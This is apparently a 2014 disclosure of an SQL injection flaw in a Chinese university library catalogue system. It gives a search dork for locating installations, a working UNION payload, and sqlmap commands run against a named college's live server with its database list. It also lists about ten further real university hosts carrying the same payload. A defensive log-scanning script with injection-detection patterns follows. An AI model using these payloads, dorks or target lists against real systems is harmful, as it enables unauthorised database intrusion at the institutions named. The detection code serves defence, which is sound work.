Beichuang Library Retrieval System (北创图书检索系统) SQL Injection Vulnerability, Part 1
2014-12-12 10:22:32         Source: 路人甲

Insufficient input filtering at one point in the Beichuang library retrieval system leads to SQL injection, affecting many universities.


Baidu search: inurl:/opac_two/search2


Injection URL: /opac_two/search2/shelves_checkout.jsp?library_id= &rec_ctrl_id=
Injected parameter: rec_ctrl_id
Payload: library_id=A&rec_ctrl_id=0195033665'+and+1=2+union+select+NULL,'111111',NULL,NULL,NULL,NULL,NULL,NULL,NULL--  (the back end is an MSSQL database)


Beijing Women's College (北京女子学院), http://219.242.31.130:8080/opac_two/, is used as the test case.
Test URL: http://219.242.31.130:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665
(1) UNION injection
http://219.242.31.130:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665'+and+1=2+union+select+NULL,'111111',NULL,NULL,NULL,NULL,NULL,NULL,NULL--


(2) sqlmap injection

$ py sqlmap.py -u 'http://219.242.31.130:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665' -p rec_ctrl_id --level 5 --risk 3 --random-agent --dbs -v 1 --batch
---
Place: GET
Parameter: rec_ctrl_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: library_id=A&rec_ctrl_id=0195033665' AND 8430=8430 AND 'LBSb'='LBSb

Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: library_id=A&rec_ctrl_id=0195033665' UNION ALL SELECT NULL,CHAR(113)+CHAR(110)+CHAR(99)+CHAR(112)+CHAR(113)+CHAR(86)+CHAR(102)+CHAR(72)+CHAR(89)+CHAR(

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: library_id=A&rec_ctrl_id=0195033665' AND 8352=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sy
---
[18:13:54] [INFO] testing Microsoft SQL Server
[18:13:54] [INFO] confirming Microsoft SQL Server
[18:14:00] [WARNING] reflective value(s) found and filtering out
[18:14:10] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server Unknown
[18:14:14] [INFO] fetching database names
available databases [6]:
[*] master
[*] melinets
[*] model
[*] sybsystemdb
[*] sybsystemprocs
[*] tempdb



Other test cases (the back end is an MSSQL database):
(1)http://opac.lnu.edu.cn/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 



py sqlmap.py -u 'http://opac.lnu.edu.cn/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665' -p rec_ctrl_id --level 5 --risk 3 --technique=U --union-cols=9 --dbms mssql --dbs --batch



(2)http://202.118.84.134:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--



(3)http://219.218.26.4:85/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--



(4)http://202.197.224.89:8088/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--



(5)http://218.107.150.8/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--



(6)http://202.197.224.89:8088/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--



(7)http://202.197.224.89:8088/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--



(8)http://202.118.84.134:8080/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--



(9)http://202.197.224.89:8088/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--



(10)http://218.107.150.8/opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL--



Solution:

Filter the input.
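Operators of an affected installation will want to know whether this endpoint has already been probed. The following Python is an added example, not code from the original report or from the Beichuang product: it scans access-log lines for requests to shelves_checkout.jsp whose rec_ctrl_id value carries one of the three payload shapes quoted above (UNION, boolean-blind, heavy-query time-based). The log lines, client IPs and the index.jsp path are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter named in the report.
VULNERABLE_PATH = "/opac_two/search2/shelves_checkout.jsp"
PARAM = "rec_ctrl_id"

# Signatures derived from the three payload shapes quoted in the report; order matters,
# since the UNION payload also contains an "' and 1=2" boolean fragment.
SIGNATURES = [
    ("union-select", re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I)),
    ("time-based", re.compile(r"count\(\*\).*\bsysusers\b", re.I)),
    ("boolean-blind", re.compile(r"'\s*and\s+\d+\s*=\s*\d+", re.I)),
]

# Common Log Format: client ip, identd, user, [timestamp], "METHOD target PROTO", status, bytes.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

def classify_request(target):
    """Return the signature name matched by the request target, or None if it looks benign."""
    parts = urlsplit(target)
    if parts.path != VULNERABLE_PATH:
        return None
    # parse_qs percent-decodes and turns '+' into spaces, as the servlet container would.
    for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
        for name, pattern in SIGNATURES:
            if pattern.search(value):
                return name
    return None  # legitimate record IDs in the report are purely numeric

def scan_log(lines):
    """Return (client_ip, timestamp, signature) for every log line carrying an injection payload."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and m.group("method") == "GET":
            sig = classify_request(m.group("target"))
            if sig:
                hits.append((m.group("ip"), m.group("ts"), sig))
    return hits

# Constructed sample log lines (client IPs from the 192.0.2.0/24 documentation range); the
# payloads mirror the UNION, boolean-blind and heavy-query probes shown in the report.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Dec/2014:18:10:01 +0800] "GET /opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [12/Dec/2014:18:12:30 +0800] "GET /opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27+and+1=2+union+select+NULL,%27111111%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- HTTP/1.1" 200 4870',
    '192.0.2.11 - - [12/Dec/2014:18:13:54 +0800] "GET /opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27%20AND%208430%3D8430%20AND%20%27LBSb%27%3D%27LBSb HTTP/1.1" 200 5120',
    '192.0.2.11 - - [12/Dec/2014:18:14:02 +0800] "GET /opac_two/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=0195033665%27%20AND%201%3D(SELECT%20COUNT(*)%20FROM%20sysusers%20AS%20sys1,sysusers%20AS%20sys2) HTTP/1.1" 200 5120',
    '192.0.2.12 - - [12/Dec/2014:18:15:00 +0800] "GET /opac_two/index.jsp?q=union+select HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, ts, sig in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} {sig}")
```

Requests to other paths are ignored even when they contain SQL keywords, so the check stays scoped to the endpoint the report names; widen VULNERABLE_PATH if other pages of the same product prove affected.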
